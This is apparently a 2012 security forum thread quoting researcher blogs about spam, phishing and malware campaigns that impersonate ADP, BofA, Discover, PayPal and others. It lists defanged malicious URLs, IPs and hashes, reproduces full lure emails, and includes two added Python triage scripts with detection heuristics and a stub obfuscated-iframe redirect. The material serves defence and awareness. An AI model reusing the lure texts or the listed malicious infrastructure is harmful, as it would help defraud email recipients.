File name: Skype_Password_inscturtions.pdf.exe
Detection ratio: 32/43
Analysis date: 2012-10-18
___
apl.de.ap SPAM
- http://blog.dynamoo.com/2012/10/apldeap-spam.html
26 Oct 2012 - "I'm not really a fan of the Black Eyed Peas, so I'd never heard of apl.de.ap ( http://en.wikipedia.org/wiki/Apl.de.ap ) until I received this spam. I'm pretty sure that Mr ap isn't sending these out himself, but they're coming from a spammer in the UAE, a place which seems to be the spam capital of the middle east. Although those look like tinyurl links, they're not... they go through a redirector at ykadl .net on 109.236.88.71, the same IP used to send the spam... here's the spam in case you really want to buy tickets from a shady bunch of spammers (NOT)...
From: DNA alex @ ykadl .net
Date: 26 October 2012 04:48
Subject: Black Eyed Peas/ APL DE AP in Dubai
Signed by: ykadl.net
BLACK EYE PEAS founding member APL DE AP heads to Dubai
BLACK EYE PEAS founding member APL DE AP to Dubai for the first time.The internationally famed Black Eyed Peas rapper/DJ, who has won 7 Grammy Awards and sold over 70 million albums, will be the headliner performance at Nasimi Beach on Thursday 1st November.
Like his high school friend Will I Am, APL DE AP also DJ's with international bookings all around the globe including Ibiza, Cannes and London, recently headlining at Belgium's Tomorrowland Festival. The American-Philippines star headlines this event with support from Dion Mavath, local celebrity DJ Marwan Bliss/ 411, Mathew Charles and as well as a performance by Number One selling band Swickasswans.
APL DE AP and the other members of the Black Eyed Peas have been on a hiatus ..."
___
ADP SPAM / steamedboasting .info
- http://blog.dynamoo.com/2012/10/adp-spam-steamedboastinginfo.html
26 Oct 2012 - "This fake ADP spam leads to malware on steamedboasting.info:
From: ClientService @adp .com
Sent: 26 October 2012 12:03
Subject: ADP Instant Notification
ADP Urgent Warning
Reference #: 31344
Dear ADP Client October, 25 2012
Your Transfer Summary(s) have been uploaded to the web site:
https ://www.flexdirect.adp .com/client/login.aspx
Please take a look at the following information:
• Please note that your bank account will be charged within 1 banking day for the amount(s) specified on the Statement(s).
•Please DO NOT reply to this message. automative notification system cannot accept incoming messages. Please Contact your ADP Benefits Specialist.
This note was sent to existing users in your company that approach ADP Netsecure.
As always, thank you for choosing ADP as your business companion!
Ref: 31344
The malicious payload is at [donotclick]steamedboasting .info/detects/burying_releases-degree.php, the initial redirection page has some Cloudflare elements on it which is a bit disturbing. steamedboasting .info is hosted on 195.198.124.60 (Skand Meteorologi och Miljoinstr AB, Sweden).
This is an alternative variant with the same malicious payload:
Date: Fri, 26 Oct 2012 16:32:10 +0530
From: "noreply @adp .com"
Subject: ADP Prompt Communication
ADP Speedy Notification
Reference #: 27585
Dear ADP Client October, 25 2012
Your Transaction Statement(s) have been put onto the web site:
Web site link
Please see the following notes:
• Please note that your bank account will be charged-off within 1 banking business day for the amount(s) specified on the Protocol(s).
•Please do not reply to this message. automative notification system can't accept incoming mail. Please Contact your ADP Benefits Specialist.
This message was sent to operating users in your company that approach ADP Netsecure.
As always, thank you for choosing ADP as your business partner!
Ref: 27585 [redacted] ..."
___
"Your Photos" SPAM / manekenppa .ru
- http://blog.dynamoo.com/2012/10/your-photos-spam-manekenpparu.html
26 Oct 2012 - "This fake "photos" spam leads to malware on manekenppa .ru:
From: Acacia @redacted .com
Sent: 26 October 2012 10:14
Subject: Your Photos
Hi,
I have attached your photos to the mail (Open with Internet Explorer).
In this case there is an attachment called Image_DIG691233.htm that leads to a malware laden page at [donotclick]manekenppa .ru:8080/forum/links/column.php hosted on some familiar looking IPs:
79.98.27.9 (Interneto Vizija, Lithuania)
203.80.16.81 (MYREN, Malaysia)
209.51.221.247 (eNet, US)
We've seen these IPs before and they are well worth blocking."
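Two attachment types recur through these posts: executables with a decoy document extension (Skype_Password_inscturtions.pdf.exe, UPS_Delivery_Confirmation.pdf.exe) and .htm files "to be opened with Internet Explorer" whose obfuscated JavaScript bounces the reader to the exploit-kit page. The block below is an added example of a mail-gateway triage routine for exactly those cases, not code from Webroot, Dynamoo or GFI. The attachments it inspects are constructed stand-ins (a byte stub with an "MZ" header that is not a real binary, a small HTML page that unwraps itself with unescape(), a minimal PDF); the extension lists and the script heuristic are assumptions; the MD5 values in the known-bad set are the ones quoted from the Webroot posts above, included only to show the lookup, and none of the constructed stubs hashes to them.

```python
import hashlib
import re
from email.message import EmailMessage

# Final extensions that execute on Windows, and the decoy "document" extensions
# seen in the names quoted above (assumed lists for the example).
EXECUTABLE_EXT = {"exe", "scr", "com", "pif", "bat", "cmd", "js", "vbs"}
DECOY_EXT = {"pdf", "doc", "docx", "xls", "jpg", "jpeg", "png", "txt"}
# Calls an obfuscated redirector commonly uses to unwrap itself (assumed heuristic).
OBFUSCATED_JS = re.compile(r"\b(eval|unescape|fromCharCode|document\.write)\s*\(", re.IGNORECASE)
# MD5s quoted in the Webroot posts above; a real deployment would load a feed.
KNOWN_BAD_MD5 = {
    "0e78d3704332c59b619f872fd6d33d25",  # UPS_Delivery_Confirmation.pdf.exe / Skype_Password_inscturtions.pdf.exe
    "4a3a345c24fda6987bbe5411269e26b7",  # BritishAirways-eticket.pdf.exe
    "0938302fbf8f7db161e46c558660ae0b",  # FacebookPhoto_album.jpeg.exe
}

# Constructed stand-ins for the attachments, not the real samples.
PE_STUB = b"MZ" + b"\x90" * 58 + b"\x80\x00\x00\x00" + b"PE\x00\x00" + b"\x00" * 32
PE_STUB_MD5 = hashlib.md5(PE_STUB).hexdigest()
HTML_STUB = (b"<html><body><script>"
             b'var p="%3Ciframe%20src%3D%22http%3A%2F%2Fexample.invalid%3A8080%2Fforum%2Flinks%2Fcolumn.php%22%3E";'
             b"document.write(unescape(p));</script></body></html>")
PDF_STUB = b"%PDF-1.4\n%\xe2\xe3\xcf\xd3\n1 0 obj<<>>endobj\ntrailer<<>>\n%%EOF\n"


def triage_attachment(filename, data, known_bad=KNOWN_BAD_MD5):
    """Return {'md5', 'sha256', 'findings'} for one attachment's name and bytes."""
    exts = filename.lower().split(".")[1:]
    findings = []
    if len(exts) >= 2 and exts[-1] in EXECUTABLE_EXT and exts[-2] in DECOY_EXT:
        findings.append("double extension .%s.%s: executable posing as a %s"
                        % (exts[-2], exts[-1], exts[-2]))
    if data[:2] == b"MZ":
        findings.append("MZ header: Windows executable content")
    if exts and exts[-1] in ("htm", "html"):
        text = data.decode("utf-8", errors="ignore")
        if "<script" in text.lower():
            calls = sorted({c.lower() for c in OBFUSCATED_JS.findall(text)})
            if calls:
                findings.append("HTML attachment with script using %s" % ", ".join(calls))
    md5 = hashlib.md5(data).hexdigest()
    if md5 in known_bad:
        findings.append("MD5 %s is on the known-bad list" % md5)
    return {"md5": md5, "sha256": hashlib.sha256(data).hexdigest(), "findings": findings}


def build_sample_message():
    """Constructed message carrying the three stand-in attachments."""
    msg = EmailMessage()
    msg["From"] = "Skype <noreply@example.invalid>"
    msg["To"] = "user@example.org"
    msg["Subject"] = "Password successfully changed"
    msg.set_content("Your password has been changed. See the attached instructions.")
    for name, data in (("Skype_Password_inscturtions.pdf.exe", PE_STUB),
                       ("Image_DIG691233.htm", HTML_STUB),
                       ("quarterly_report.pdf", PDF_STUB)):
        msg.add_attachment(data, maintype="application", subtype="octet-stream", filename=name)
    return msg


def triage_message(msg, known_bad=KNOWN_BAD_MD5):
    """Map each attachment filename to its triage result."""
    return {part.get_filename(): triage_attachment(part.get_filename(), part.get_content(), known_bad)
            for part in msg.iter_attachments()}


if __name__ == "__main__":
    for name, result in triage_message(build_sample_message()).items():
        print(name, result["md5"], result["findings"] or "clean")
```

The hash lookup is the weakest of the four checks: the same campaign here shipped several builds in a week (different MD5s for the UPS, BA and Facebook runs), so the name and content checks are what catch the next build before any feed lists it.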
AplusWebMaster
2012-10-28, 20:13
FYI...
Fake BT-Business emails lead to malware ...
- http://blog.webroot.com/2012/10/28/spamvertised-bt-business-direct-order-themed-emails-lead-to-malware/
Oct 28, 2012 - "Over the past 24 hours, cybercriminals have been spamvertising millions of emails targeting customers of BT’s Business Direct in an attempt to trick its users into executing the malicious attachment found in the emails. Upon executing it, the malware opens a backdoor on the infected host, allowing the cybercriminals behind the campaign to gain complete access to the affected host...
Screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2012/10/bt_business_direct_spam_email_malware.png
Detection rate for the malicious attachment: MD5: 8d0e220ce56ebd5a03c389bedd116ac5 * ... Trojan-Ransom.Win32.Gimemo.ashm ..."
* https://www.virustotal.com/file/8f429babb19382026798f79b3e7197659639520ffa5199c8bea86c04710f7c48/analysis/
File name: 8D0E220CE56EBD5A03C389BEDD116AC5.fil
Detection ratio: 32/42
Analysis date: 2012-10-25
___
Fake Verizon Wireless emails serve client-side exploits and malware ...
- http://blog.webroot.com/2012/10/27/cybercriminals-impersonate-verizon-wireless-serve-client-side-exploits-and-malware/
Oct 27, 2012 - "... For over a week now, cybercriminals have been persistently spamvertising millions of emails impersonating the company, in an attempt to trick current and prospective customers into clicking on the client-side exploits and malware serving links found in the malicious email. Upon clicking on any of the links, users are exposed to the client-side exploits served by the latest version of the BlackHole Exploit Kit...
Screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2012/10/verizon_wireless_spam_email_exploits_malware.png
Spamvertised malicious URLs:
hxxp ://coaseguros .com/components/com_ag_google_analytics2/notifiedvzn.html;
hxxp ://clinflows .com/components/com_ag_google_analytics2/vznnotifycheck.html
Client-side exploits serving URL: hxxp ://strangernaturallanguage .net/detects/notification-status_login.php?mzuilm=073707340a&awi=45&dawn=04083703023407370609&iwnjdt=0a000300040002
Sample client-side exploits served: CVE-2010-0188
Upon successful client-side exploitation, the campaign drops MD5: b8d6532dd17c3c6f91de5cc13266f374 * ... Trojan-Spy.Win32.Zbot.fkth
Once executed, the sample phones back to tuningmurcelagoglamour .ru, tuningfordmustangxtremee .ru - 146.185.220.28, AS58014 ..."
* https://www.virustotal.com/file/2d171bb6f2084f123b2e7b5d492e66f5a0df33846b8a5ca9f2cc0232e83561f4/analysis/
File name: b8d6532dd17c3c6f91de5cc13266f374.malware
Detection ratio: 26/44
Analysis date: 2012-10-09 ..."
AplusWebMaster
2012-10-29, 13:17
FYI...
Fake British Airways emails serve malware
- http://blog.webroot.com/2012/10/29/cybercriminals-spamvertise-millions-of-british-airways-themed-e-ticket-receipts-serve-malware/
Oct 29, 2012 - "Cybercriminals are currently mass mailing millions of emails in an attempt to trick British Airways customers into executing the malicious attachment found in the spamvertised emails. Upon execution, the malware opens a backdoor on the infected host, allowing the cybercriminals behind the campaign to gain complete control over the infected host...
Screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2012/10/british_airways_spam_email_malware.png
Detection rate for the malicious attachment: MD5: 4a3a345c24fda6987bbe5411269e26b7 * ... Trojan-Downloader.Win32.Andromeda.aey..."
* https://www.virustotal.com/file/39f59152979aeb68c8a5e7e7dbc30ad06fe653a938124e2bd9c462fb7caa5c21/analysis/
File name: BritishAirways-eticket.pdf.exe
Detection ratio: 30/43
Analysis date: 2012-10-23
___
.com malware pretends to be naughty .com website
- http://blog.commtouch.com/cafe/email-security-news/com-malware-pretends-to-be-naughty-com-website/
Oct 28, 2012 - "... The email doesn’t include much text – simply asking that you 'Pay attention at the attach':
Screenshot: http://blog.commtouch.com/cafe/wp-content/uploads/com-trick-blurred.jpg
... As shown in the screenshot it’s www .——-face .com. Those tempted to double-click the “link” in order to visit a porn site would find themselves attacked by malware."
AplusWebMaster
2012-10-30, 23:09
FYI...
Bogus Facebook notifications serve malware
- http://blog.webroot.com/2012/10/30/cybercriminals-spamvertise-millions-of-bogus-facebook-notifications-serve-malware/
Oct 30, 2012 - "... cybercriminals spamvertised yet another massive email campaign, impersonating the world’s most popular social network – Facebook. It was similar to a previously profiled spam campaign imitating Facebook. However, in this case the cybercriminals behind it relied on attached malicious archives, compared to including exploits and malware serving links in the email...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2012/10/facebook_spam_email_malware.png
Detection rate for the malicious archive: MD5: 0938302fbf8f7db161e46c558660ae0b * ... Trojan.Generic.KDV.753880; Trojan-Ransom.Win32.Gimemo.arsu. Upon execution, the sample opens a backdoor on the infected host, allowing the cybercriminals behind the campaign to gain full access to the affected host..."
* https://www.virustotal.com/file/79f9b49e19495128f3539a2333c669d29f6e52105b7fb47025b9bfe373a7ded6/analysis/1350575670/
File name: FacebookPhoto_album.jpeg.exe
Detection ratio: 34/43
Analysis date: 2012-10-18
___
Blackhat SEO poisoning: Halloween tricks and holiday malware ...
- http://blogs.computerworld.com/cybercrime-and-hacking/21229/blackhat-seo-poisoning-halloween-tricks-and-holiday-malware-interview
Oct 29, 2012 - "... things like blackhat SEO poisoning to successfully infect devices. Blackhat SEO link poisoning, scams, tricks. Although the poisonous pranks and tainted tricks go far beyond Halloween, this seemed a great time to get insight into these trends as well as tips to avoid them. You might know about it, but how about your parents or other people who are not nearly so security-savvy? You might want to warn them that their simple searches could infect their computers... especially if you will be the one called upon to fix them for free ;-) ..."
(More detail at the URL above.)
AplusWebMaster
2012-10-31, 19:40
FYI... multiple entries:
Twitter phish is selling drama
- http://www.gfi.com/blog/new-twitter-phish-is-selling-drama/
Oct 30, 2012 - "... new phish in Twitter... you won’t miss it once you visit your direct message (DM) inbox. The message content can be any of the following:
- A horrible rumor is spreading about you
- A nasty rumor is spreading about you
- A terrible rumor is spreading about you
- You see this video of someone taping you? creep
- Hey you hear about the gossip your mentioned in? it started some serious drama, it fired up a lot of people on [URL redacted] sNqp
Whatever the message, it carries a shortened URL that directs the recipient to the domain ivtwtter(dot)com once clicked. Fortunately, the domain is no longer active.
> http://www.gfi.com/blog/wp-content/uploads/2012/10/02-twitter-phish.png
Web browsers have also flagged the URL as a phishing site. If you receive any of these messages (or similar), the best way to handle it is to simply delete it from your DM inbox and warn your followers. In warning them, don't copy and paste the entire message you received with the live link still in it — as some are prone to do — because this just increases the possibility of the nefarious link getting clicked..."
___
"Your Apple ID has been disabled" phish
- http://blog.dynamoo.com/2012/10/your-apple-id-has-been-disabled-phish.html
31 Oct 2012 - "I've never seen one quite like this before, although it's not the first time I've seen Apple-themed scam emails...
From: Apple no_reply @ macapple .com
Reply-To: no_reply @ macapple .com
Date: 31 October 2012 06:08
Subject: Your Apple ID has been disabled
Apple ID Support
Dear [redacted] ,
This Apple ID has been disabled!
For your protection, your Apple ID ([redacted]) is automatically disabled. We detect unauthorized Login Attempts to your Apple ID from other IP Location. Please verify your identity today or your account will be disabled due to concerns we have for the safety and integrity of the Apple Community.
To verify your Apple ID, we recommend that you go to:
Verify Now >
The phish is hosted at [donotclick]app.apple .com.proiectmaxim .ro/id2/sign_in/login_ID&=/?&=?reactivate=[redacted] and it looks pretty convincing if you haven't spotted the Romanian domain name... It just goes to show that the bad guys will try to phish -anything- these days."
___
HP ScanJet SPAM / donkihotik .ru
- http://blog.dynamoo.com/2012/10/hp-scanjet-spam-donkihotikru.html
31 Oct 2012 - "This fake printer message leads to malware on donkihotik .ru:
Date: Wed, 31 Oct 2012 05:06:42 +0300
From: LinkedIn Connections
Subject: Re: Fwd:Scan from a HP ScanJet #26531
Attachments: HP-Scan-44974.htm
Attached document was scanned and sent
to you using a Hewlett-Packard Officejet PRO.
Sent: by Bria
Image(s) : 6
Attachment: Internet Explorer file [.htm]
Hewlett-Packard Officejet Location: machine location not set
The malicious payload is at [donotclick]donkihotik .ru:8080/forum/links/column.php which is hosted on the same IP addresses as this attack* yesterday."
* http://blog.dynamoo.com/2012/10/craiglist-spam-fionadixru.html
"... some familiar IPs:
68.67.42.41 (Fibrenoire, Canada)
203.80.16.81 (MYREN, Malaysia)
209.51.221.247 (eNET, United States)
Additional name server IPs:
50.22.102.132 (Softlayer, United States)
62.76.186.190 (Clodo-Cloud, Russia)
84.22.100.108 (Cyberbunker, Netherlands)
213.251.171.30 (OVH, France)
Plain list for copy-and-pasting: (see the URL above - long list of IPs and domains) ..."
___
Steam phish steals more than credentials
- http://www.gfi.com/blog/new-phish-steals-more-than-steam-credentials/
Oct 31, 2012 - "... targeting players of the popular gaming platform, Steam. More than a year ago, Valve launched Steam Trading. The objective is to “allows you [the Steam account owner] to exchange In-game items and Gifts with everybody in the Steam Community.” It is a good move to get people within their large gaming community to engage with one another and form a bond of camaraderie. Upon its launch, Steam can only cater to a number of gamers. In particular, those who play Team Fortress 2, Portal, Spiral Knights, and other games from Three Rings and SEGA... phishing page that mimics the look and feel of the actual news page announcing the launch. The -bogus- page -baits- unknowing users with one free game this “Steam Happy Day”... at this time of writing Chrome flags the site as a phish... If you play Team Fortress 2, Portal, Spiral Knights plus other SEGA games on Steam and regularly trade items with other players, please avoid and block days(dot)steamgamesgift(dot)yzi(dot)me ... Be wary of free games and offers that would cost you more than you want to bargain for, especially if they’re hosted on dubious sites that use familiar strings in URLs you’d normally see in legitimate sites. To be safe, visit Steam directly* to double-check if they indeed have free offers..."
* http://store.steampowered.com/
:mad:
AplusWebMaster
2012-11-01, 13:09
FYI...
Bogus BofA ‘Online Banking Passcode Reset’ emails serve client-side exploits and malware
- http://blog.webroot.com/2012/11/01/bofa-online-banking-passcode-reset-themed-emails-serve-client-side-exploits-and-malware/
Nov 1, 2012 - "Cybercriminals are currently mass mailing millions of emails, in an attempt to trick Bank of America customers into clicking on the exploit and malware-serving link found in the spamvertised email. Relying on bogus “Online Banking Passcode Changed” notifications and professionally looking email templates, the campaign is the latest indication of the systematic rotation of impersonated brands in an attempt to cover as many market segments as possible...
Screenshot of a sample spamvertised email:
> https://webrootblog.files.wordpress.com/2012/10/bank_of_america_spam_email_malware_exploits.png
... Client-side exploits serving URL: hxxp ://the-mesgate .net/detects/signOn_go.php – 183.81.133.121, AS38442 ... Also responding to the same IP are the following malicious domains:
stafffire .net – 183.81.133.121, AS38442
hotsecrete .net – Email: counseling1 @ yahoo .com
formexiting .net – suspended domain
navisiteseparation .net – suspended domain ...
Related malicious domains responding to these IPs:
change-hot .net
locksmack .net
Money mule recruitment domains using the same IP as a mailserver:
aurafinancialgroup .com
epscareers .com
As you can see, this campaign is a great example of the very existence of the cybercrime ecosystem. Not only are they spamvertising millions of exploits and malware serving emails, they’re also multitasking on multiple fronts, as these two domains are recruiting money mules to process fraudulently obtained assets from the affected victims..."
___
Discover card SPAM / netgear-india.net
- http://blog.dynamoo.com/2012/11/discover-card-spam-netgear-indianet.html
1 Nov 2012 - "This fake Discover Card spam leads to malware on netgear-india .net:
From: Discover Account Notes [mailto:no-reply @ notify .discover .com]
Sent: Thu 01/11/2012 15:32
Subject: Great Details Changes in your Discover card Account Terms
Account Services | Customer Care Services
Account ending in XXX1
An substantial communication regarding latest Declined Transfers is waiting for you.
Log In to Read Information
Honored Discover Client,
There is an serious message waiting for you from Discover® card. Please read the message mindfully and keep it with your file.
To ensure optimal privacy, please log in to view your message at Discover.com.
Please click on this link if you have forgotten your UserID or Password.
Add information @ service .discover .com to your address book to ensure delivery of these notifications.
VITAL NOTE
This message was delivered to [redacted] for Discover debit card account number ending with XXX1.
You are receiving this e-mail because you have account at Discover.com.
Log in to change your e-mail address or overview your account e-mail options.
If you have any questions about your account, please Login to leave us a message securely and we would be glad to support you.
Please DO NOT reply to this message. auto informer system cannot accept incoming email.
DISCOVER and other trademarks, logos and service marks used in this e-mail are the trademarks of Discover Financial Services or their respective third-party owners.
Discover Banking Ltd.
P.O. Box 84265
Salt Lake City, SC 76433
2012 Discover Bank, Member FDIC
[redacted]
========
From: Discover Account Notes [mailto:donotreply @service .discover .com]
Sent: Thu 01/11/2012 16:36
Subject: Substantial Information about your Discover Account
Account Center | Customer Center
Account ending in XXX9
An significant message regarding latest Approved Activity is waiting for you.
Log In to Overview Details
Respective Cardholder,
There is an important message waiting for you from Discover® card. Please read the message carefully and keep it with your archive.
To ensure optimal privacy, please sign in to read your data at Discover.com.
Please visit discover .com if you have forgotten your Login ID or Password.
Add discover @ information .discover .com to your trusted emails to ensure delivery of these messages.
VITAL NOTIFICATION
This e-mail was sent to [redacted] for Discover card account No. ending with XXX9.
You are receiving this e-mail because you member of Discover.com.
Log in to change your e-mail address or view your account e-mail settings.
If you have any questions about your account, please Enter your account to leave us a message securely and we would be blissful to help you.
Please don't reply to this message. auto-notification system cannot accept incoming mail.
DISCOVER and other trademarks, logos and service marks used in this e-mail are the trademarks of Discover Financial Services or their respective third-party owners.
Discover Banking Llc.
P.O. Box 85486
Seashore City, NV 91138
2012 Discover Bank, Member FDIC
[redacted]
The malicious payload is at [donotclick]netgear-india .net/detects/discover-important_message.php hosted on 183.180.134.217 (RAT CO, Japan). The following domains are on that same IP, and judging by the registration details they should also be considered as malicious:
(see the URL above - long list of domains) ..."
___
Hurricane Sandy SPAMs lead to survey scams
- http://nakedsecurity.sophos.com/2012/11/01/hurricane-sandy-spams-lead-to-survey-scams/
Nov 1, 2012 - "... we began to see the first online criminals trying to cash in on the interest in Hurricane Sandy. The good news is they are not trying to spread malware (yet), but the bad news is they are trying to take advantage of a natural disaster affecting millions. The subject lines of the scam messages -- "Sandy Got you down? We've got you covered!", "Don't let the storm ruin your diner plans" and "Avoid the Storm, Eat at chilis!" -- appear to be targeting people who may need to file insurance claims related to damages from the "super storm" and other people who are simply hungry. The bodies of the emails aren't terribly interesting, but every place in the message is a link to a site called "remain watery." The domain was registered on October 15th, clearly in anticipation of creating more victims from this crisis... For those who are affected by the hurricane, stay safe, stay secure, and don't fall for it. The last thing you need right now is another thing to worry about cleaning up after."
___
Hurricane Sandy pump and dump SPAM
- http://blog.commtouch.com/cafe/anti-scam/pump-and-dump-spam-waits-for-hurricane-sandy/
Oct 31, 2012 - "... recipients are encouraged to buy into low-priced shares now that Hurricane Sandy has passed and trading has resumed.
> http://blog.commtouch.com/cafe/wp-content/uploads/Hurricane-Sandy-stock-spam.jpg
... we see less topical spam than we used to. In the past spammers would use current events in subjects and in the text of emails to create interest and generate visits to pharmacy and replica websites..."
:mad:
AplusWebMaster
2012-11-02, 14:40
FYI...
Fake ADP SPAM emails lead to BlackHole Exploit Kit
- http://blog.webroot.com/2012/11/02/adp-immediate-notification-themed-emails-lead-to-black-hole-exploit-kit/
Nov 2, 2012 - "... cybercriminals behind the recently profiled malicious campaign impersonating Bank of America, launched yet another massive spam campaign, this time targeting ADP customers. Upon clicking on the link found in the malicious email, users are exposed to the client-side exploits served by the latest version of the Black Hole Exploit Kit...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2012/10/adp_email_spam_exploits_malware.png
... Client-side exploits serving URL: hxxp ://reasonedblitzing .net/detects/lorrys_implication.php – 195.198.124.60, AS3301 – Email: monteene_forbrich8029 @ mauritius.com; hxxp ://nfcmpaa .info/detects/burying_releases-degree.php – 195.198.124.60, AS3301 – Email: nevein_standrin35 @ kube93mail .com...
Responding to the same IP are also the following malicious domains:
win8ss .com – Email: fermetnolega @ hotmail .com
legacywins .com – Email: fermetnolega @hotmail .com
openpolygons .net – Email: cordey_yabe139 @ flashmail .net
steamedboasting .info – Email: mauro_borozny655 @ medical .net.au
Name servers part of the campaign’s infrastructure:
Name Server: NS1.TOPPAUDIO .COM
Name Server: NS2.TOPPAUDIO .COM
We’ve already seen the same name servers used in the recently profiled “BofA ‘Online Banking Passcode Reset’ themed emails serve client-side exploits and malware” malicious campaign. Clearly, the cybercriminal or gang of cybercriminals behind the campaign continue rotating the impersonated brands, next to using the same malicious infrastructure to achieve their objectives..."
___
Fake "Payroll Account Cancelled by Intuit" email
- http://security.intuit.com/alert.php?a=67
11/2/2012 - "People are receiving emails with the title "Notification Only: Payroll Account Cancelled by Intuit." Below is a copy of the email people are receiving.
Direct Deposit Service Informer
Informational Only
We processed your payroll on November 1, 2012 at 365 PM Pacific Time.
Money would be revoked from the Checking account number ending in: XXX3 on November 2, 2012.
total to be left: $2 465.98
Paychecks would be deferred to your workforce' accounts on: November, 2, 2012
Sign In to Overview Details
Funds are typically departed before business banking hours so please be sure you have enough Cash on the account by 12 a.m. on the date Funds are to be withdrawn.
Intuit must process your payroll by 4 p.m. Eastern time, two banking days before your paycheck date or your personnel will not be paid on time. QuickBooks does not process payrolls on weekends or federal banking holidays. A list of federal banking holidays can be viewed at the Federal Reserve website.
Thank you for your business.
Regards,
Intuit Payroll Services
This is the end of the fake email..."
- http://blog.dynamoo.com/2012/11/intuit-spam-savedordercommunicatesinfo.html
2 Nov 2012 - "... fake Intuit spam leads to malware on savedordercommunicates .info:
... Subject: Notification Only: Transaction Received by Intuit"...
The malicious payload is at [donotclick]savedordercommunicates .info/detects/bank_thinking.php hosted on 75.127.15.39 (New Wave NetConnect, US) along with another malicious domain of teamscapabilitieswhich .org. Blocking this IP would be wise."
___
Wire Transfer SPAM / webmoniacs .ru
- http://blog.dynamoo.com/2012/11/wire-transfer-spam-webmoniacsru.html
2 Nov 2012 - "This fake wire transfer spam leads to malware on webmoniacs .ru:
Date: Fri, 2 Nov 2012 06:23:10 +0700
From: service @ paypal .com
Subject: RE: Wire Transfer cancelled
Dear Sirs,
The Wire transfer was canceled by the other bank.
Canceled transaction:
FED REFERENCE NUMBER: 628591160ACH34584
Transaction Report: View
The Federal Reserve Wire Network
The malicious payload is at [donotclick]webmoniacs .ru:8080/forum/links/column.php hosted on:
65.99.223.24 (RimuHosting, US)
203.80.16.81 (MYREN, Malaysia)
209.51.221.247 (eNet, US)
The following IPs and domain are all connected and should be blocked:
(see the URL above - long list of IPs and domains) ..."
- https://www.ic3.gov/media/2012/121101.aspx
Nov 1, 2012
:mad:
AplusWebMaster
2012-11-05, 14:11
FYI...
Malware... as a Vodafone MMS message
- http://h-online.com/-1743608
5 Nov 2012 - "The phone number from which the message was supposedly sent varies... Cyber criminals are currently spreading malware by sending a large number of email messages purporting to be from Vodafone's MMS gateway. These emails have the subject "You have received a new message" and claim that the recipient has been sent a picture message over MMS from a Vodafone customer. The Vodafone email address used and the supposed telephone number sending the messages varies*; even the country code is changed based on the location being targeted...
* http://www.h-online.com/security/news/item/Malware-discussed-as-an-MMS-message-1743608.html?view=zoom;zoom=1
The messages say that a picture message is in the attached "Vodafone_MMS.zip" file. However, once unzipped, it only contains an executable named "Vodafone_MMS.jpg.exe" that will install malware onto a victim's system when launched... VirusTotal*... To avoid accidentally opening such files and becoming infected with malware, Windows users should also make sure that file name extensions are always shown**..."
* https://www.virustotal.com/file/bb2fadd8e156cf40753cabb38db5a0d88c1d5cd90418a9a26e60e9248a65f9a7/analysis/
File name: Vodafone_MMS.zip
Detection ratio: 11/43
Analysis date: 2012-11-05
** https://en.wikipedia.org/wiki/Filename_extension#Security_issues
"... default behavior of Windows Explorer... is for filename extensions -not- to be shown... without alerting the user to the fact that (it may be) a harmful computer program..."
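The double-extension trick described above (a lure named Vodafone_MMS.jpg.exe that Explorer shows as a .jpg when extensions are hidden) can be caught at the mail gateway before a user ever sees the archive. This is an added Python example, not code from h-online or Vodafone; the .zip it scans is constructed inline, and the extension sets are an assumed, non-exhaustive choice.

```python
import io
import os
import zipfile

# Suffixes Windows will run on double-click (assumption: representative subset).
EXECUTABLE_EXTS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".js", ".vbs"}
# Harmless-looking suffixes a lure places in front of the real one.
DECOY_EXTS = {".jpg", ".jpeg", ".png", ".gif", ".pdf", ".doc", ".txt"}


def classify_member(name):
    """Verdict for one archive member name.

    With extensions hidden, 'Vodafone_MMS.jpg.exe' is displayed as
    'Vodafone_MMS.jpg'. We therefore look at the *last* suffix to decide
    what Windows would execute, and at the one before it to spot a decoy.
    """
    base = os.path.basename(name).lower()
    root, last = os.path.splitext(base)
    _, second = os.path.splitext(root)
    if last in EXECUTABLE_EXTS and second in DECOY_EXTS:
        return "disguised-executable"
    if last in EXECUTABLE_EXTS:
        return "executable"
    return "other"


def scan_zip_bytes(data):
    """Scan an in-memory .zip attachment; returns {member name: verdict}."""
    verdicts = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            verdicts[info.filename] = classify_member(info.filename)
    return verdicts


def is_suspicious(verdicts):
    """True if any member would run as a program when opened."""
    return any(v != "other" for v in verdicts.values())


def build_sample_zip(member_names):
    """Constructed sample attachment (not the real Vodafone_MMS.zip)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for n in member_names:
            zf.writestr(n, b"MZ placeholder")  # contents irrelevant here
    return buf.getvalue()


if __name__ == "__main__":
    lure = build_sample_zip(["Vodafone_MMS.jpg.exe"])
    verdicts = scan_zip_bytes(lure)
    print(verdicts, "suspicious" if is_suspicious(verdicts) else "clean")
```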
___
Wire Transfer & PayPal SPAM / forumibiza .ru
- http://blog.dynamoo.com/2012/11/wire-transfer-paypal-spam-forumibizaru.html
5 Nov 2012 - "These two spam campaigns lead to malware on forumibiza .ru:
Date: Mon, 5 Nov 2012 12:54:44 +0530
From: Declan Benjamin via LinkedIn ...
Subject: Wire Transfer Confirmation (FED 27845UL095)
Good afternoon,
Your Wire Transfer Amount: USD 85,714.01
Wire Transfer Report: View
ELOISA STRICKLAND,
The Federal Reserve Wire Network
==============
From: JoyceMillwee @ mail .com
Sent: 05 November 2012 01:48
Subject: Welcome to PayPal - Choose your way to pay
Welcome
Hello [redacted],
Thanks for paying with PayPal.
We congratulate you with your first Paypal money transfer. But we have hold it for the moment because the amount is over the security borders of our rules.
Here is what we have on file for you. Take a second to confirm we have your correct information.
Email
[redacted]
Confirmation Code
5693-0930-8767-9350-6794
Transfer Information
Amount: 27380.54 $
Reciever: Gracia Cooley
E-mail: Gage97742 @[redacted] .com
Accept Decline
Help Center | Security Center
Please don't reply to this email. It'll just confuse the computer that sent it and you won't get a response.
Copyright 2012 PayPal, Inc. All rights reserved. PayPal is located at 2211 N. First St., San Jose, CA 95131.
PayPal Email ID PP6118
The malicious payload in both cases is [donotclick]forumibiza .ru:8080/forum/links/column.php hosted on the following IPs:
65.99.223.24 (RimuHosting, US)
